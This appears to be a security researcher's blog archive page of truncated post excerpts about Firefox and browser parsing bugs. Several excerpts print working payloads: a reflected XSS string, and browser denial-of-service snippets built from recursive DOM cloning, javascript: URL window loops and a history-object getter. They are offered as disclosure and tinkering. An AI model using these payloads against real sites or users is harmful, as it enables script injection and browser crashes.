Update… Mozilla have now fixed the problem on Thursday. Not only did they take down the original release but fixed it very quickly within two days which is very impressive. Good work! I was writing some JavaScript and found that the following happens: /undefined/.test(undefined)//true The undefined value is converted to a string and then the […]

I was experimenting with some HTML vectors to break the various HTML parsers in the browsers, I wanted to continue till I found a cool one for Firefox because I like to bully the memory hogging browser as I use it a lot. I found some weird rendering in Firefox, Chrome and Opera. It started […]

Custom setters syntax are being removed from Firefox in the next version.. boo I here you say well at least some of you. If you don’t know Firefox decided it would create it’s own setter syntax (I love it when you do that you know) ages ago and it looked something like this:- a setter=alert,a=1//calls […]

Check this DOS in Firefox:- <img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))"> There are many DOM related Firefox problems, this was one of the more interesting ones I found 🙂

Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:- "><script>alert(/XSS PUNCH!/)</script> Then you can respond with the crouching tab hidden dos move:- self.location = “javascript:window.open(‘javascript:document.clear(); document.open();document.close();self.location=self.location’)”; This move can frustrate your opponent into submission.

Here’s a complete DOS attack on Firefox using the history object:- window.onload = function() { history.__defineGetter__(“x”, function() { for(i in this) { try { alert(this[i]); } catch(e) { } } }); history.x; } Tested on Firefox 2.0.0.9 mac, a window pops up with two blank buttons and you are unable to do anything without using […]

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong 🙂 This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know 😉 ). There […]

For those of you that read my blog you’ll know that I’m not a big fan of iframes for various reasons. I wrote a Javascript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now….noscript now has iframe protection which is fantastic news, […]